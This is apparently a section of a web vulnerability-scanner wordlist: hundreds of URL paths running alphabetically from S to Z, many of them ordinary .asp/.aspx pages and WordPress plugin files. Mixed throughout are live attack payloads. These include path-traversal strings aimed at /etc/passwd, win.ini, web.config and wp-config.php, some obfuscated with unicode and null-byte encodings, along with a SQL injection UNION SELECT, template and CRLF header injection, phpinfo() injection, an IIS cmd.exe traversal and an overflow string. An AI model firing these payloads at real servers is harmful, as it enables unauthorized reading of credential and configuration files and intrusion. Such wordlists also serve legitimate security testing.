scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
scrm/crm/admin
_search
search.asp
Search.aspx
searchblox/servlet/FileServlet?col=9&url=/etc/passwd
SearchHelp.aspx
search?NS-query-pat=..\..\..\..\..\boot.ini
_search?pretty
SearchResults.aspx
search?search_key=%7B%7B1337*1338%7D%7D
Security.aspx
selimage.asp
Send.asp
Send.aspx
SendEmail.asp
sendmail.asp
sensorlist.htm
server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
service.asp
services.aspx
service/v1/service-details
sess-bin/login_handler.cgi
session.asp
Setting.asp
settings.asp
Settings.aspx
setup.asp
Setup.aspx
SetupVS.aspx
sha1.asp
shangchuan.asp
share
Shipping.aspx
shopping_cart.aspx
ShoppingCart.aspx
showall.asp
show.asp
Show.aspx
ShowcontentPic.asp
showerr.asp
ShowHeadPic.asp
ShowImg.asp
ShowNewsPic1.asp
ShowNewsPic.asp
ShowpinpaiPic1.asp
ShowpinpaiPic.asp
ShowProduPic.asp
showvote111.asp
showvote.asp
showvotedetails1.asp
ShowyingpinPic.asp
Side.php
signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd
SignIn.aspx
Site.aspx
sitemap.asp
SiteMap.aspx
sitemap.xml
sites
siteserver
SiteServer/Admin
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
siteserver/publishing/viewcode.asp
SiteServer/Publishing/viewcode.asp
SiteSettingsEdit.aspx
SiteSettingsList.aspx
Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
smiley.asp
soft.asp
solr/admin/
sql.asp
SSI/Auth/ip_snmp.htm
Start.aspx
Startup.asp
stat.asp
Statistics.aspx
stats.asp
Status.asp
status.htm
step1.asp
string.asp
struts2-rest-showcase/orders/3
StudentResult.aspx
StudyResult.aspx
stylesheet.aspx
sysmgmt/2015/bmc/session
sysset.asp
system
System.asp
system/sharedir.php
system_web
sysuser.asp
Tables.aspx
tabs.aspx
tag.asp
Tag.aspx
TagMiniView.aspx
tags.asp
Tasks.aspx
techlist.asp
technews.asp
Template.asp
template/custom/content-editor
Templates.aspx
templates/editor-preload-container
templates_view.asp
test
test.asp
test.aspx
testing-put.txt
tests/support/stores/test_grid_filter.php?query=phpinfo();
test.txt%0D%0ASet-Cookie:CRLFInjection%3DTest%0D%0ALocation:%20example.com%0D%0AX-XSS-Protection:0
TestValidatonControls.aspx
textbox.asp
textbox_jj.asp
textbox_news.asp
textbox_produ.asp
ThankYou.aspx
theme/default/img/../../../../../../../../../../../../../../../..//etc/passwd
tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
top1.asp
Top_admin.asp
top.asp
Top.aspx
topic.asp
TopicOther.asp
track.asp
tsweb
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd HTTP/1.1
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini HTTP/1.1
ubb.asp
ubbcode.asp
Ubblist.asp
ubbshow.asp
ucmdb-api/connect
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
ui/login.php?user=admin
uir//etc/passwd
UnitTests.aspx
Update.asp
Update.aspx
Updater.aspx
Update_User.asp
upfile.asp
upfile_class.asp
upfile_lx.asp
upfile_xx.asp
UpImg.asp
upload_5xsoft.asp
upload_5xsoft.inc.asp
upload.asp
upload.aspx
Upload_Class.asp
uploader.asp
UpLoadFile.aspx
UpLoadList.asp
upload_lx.asp
UploadProperty.aspx
upload_xx.asp
UpUserFace.asp
useraccount.aspx
user.asp
user_info.asp
userinfo.asp
userlist.asp
UserList.aspx
userManage.aspx
UserManagement.aspx
usermanager.asp
UserPay.asp
UserProfile.aspx
userregmanager.asp
UserRoleEdit.aspx
UserRoleList.aspx
UserRoles.aspx
Users.aspx
user_shenhe.asp
usersms.asp
_users/org.couchdb.user:poc
users/sign_in
users/user-dark-features
utf-8.asp
utf8.asp
util.asp
../../../../../../../../../../../../../../var/www/html/index.html
vc30
verify.php?id=1&confirm_hash=
Version.asp
version.web
ViewAll.aspx
view.asp
View.aspx
viewer.aspx
viewfile.asp
ViewInfo.asp
ViewPage1.aspx
viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
viewsavebody.asp
VirtualServer.aspx
voteadd.asp
vote.asp
Vote.aspx
votedel.asp
votedy.asp
vote_function.asp
votelist.asp
Vote_List.asp
votemodify.asp
vote_save.asp
votesave.asp
vote_showcode.asp
votetou.asp
vpn/../vpns/cfg/smb.conf
_vti_adm
_vti_aut
_vti_bin
_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/fpcount.exe?Page=default.asp|Image=3
_vti_bin/shtml.dll
_vti_bin/shtml.dll/asdfghjkl
_vti_bin/shtml.exe/qwertyuiop
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?1234=X
_vti_cnf
_vti_log
_vti_pvt
_vti_pvt/administrator.pwd
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/shtml.exe
_vti_pvt/users.pwd
_vti_script
_vti_txt
wan.htm
wap.asp
wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
wdxz.asp
Wealth.asp
web
webadmin/auth/verification.php
webadmin/index.php
webadmin/out
webapi/v1/system/accountmanage/account
../../../../../web.config HTTP/1.1
../../../../web.config HTTP/1.1
../../../web.config HTTP/1.1
../../web.config HTTP/1.1
../web.config HTTP/1.1
web.config.i18n.ashx?l=nuclei&v=nuclei
WebForm1.aspx
_WEB_INF
WEB-INF/web.xml
/../../../WEB-INF/web.xml%00.jsp HTTP/1.1
/../../WEB-INF/web.xml%00.jsp HTTP/1.1
/../../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../../../WEB-INF/web.xml? HTTP/1.1
/../WEB-INF/web.xml? HTTP/1.1
webpub
WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
WebSer~1
website/blog/
webtools/control/main
welcome.asp
.well-known/security.txt
wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
WidgetEditor.aspx
wiki/pages/createpage-entervariables.action
wiki/pages/createpage-entervariables.action?SpaceKey=x
..../..../..../..../..../..../..../..../..../windows/win.ini
.../.../.../.../.../.../.../.../.../windows/win.ini
../../../../../../../../windows/win.ini
/../../../../../../../../windows/win.ini%00.jpg HTTP/1.1
/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini HTTP/1.1
winnt
wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
wls-wsat/RegistrationRequesterPortType
wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
wp-admin/install.php
wp-content/force-download.php?file=../wp-config.php
wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
wp-content/plugins/quiz-master-next/README.md
wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
wp-content/plugins/simple-file-list/ee-file-engine.php
wp-content/plugins/simple-file-list/ee-upload-engine.php
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
wp-content/plugins/wp-statistics/readme.txt
wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
wp-content/uploads/simple-file-list/nuclei.php
wp-json/acf/v3/options/a?id=active&field=plugins
wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
www.key
wwwroot
wwwroot/1_0_2204_21
wzgg_Modify.asp
wzgg_Modify_Save.asp
xbgl.asp
xbnews.asp
x.cfm
xgadmin.asp
xg.asp
x.htw
x.htx
x.ida
x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
x.idc
x.idq
xmgl.asp
xmglzn.asp
xml.asp
XMLCHART
xmlpserver/ReportTemplateService.xls
x.pl
xsgl.asp
xsglzn.asp
x.shtml
xsnews.asp
xswyh.asp
zhengzhi.asp
zhidu.asp
zlgl.asp
zlglzn.asp
zms/admin/index.php
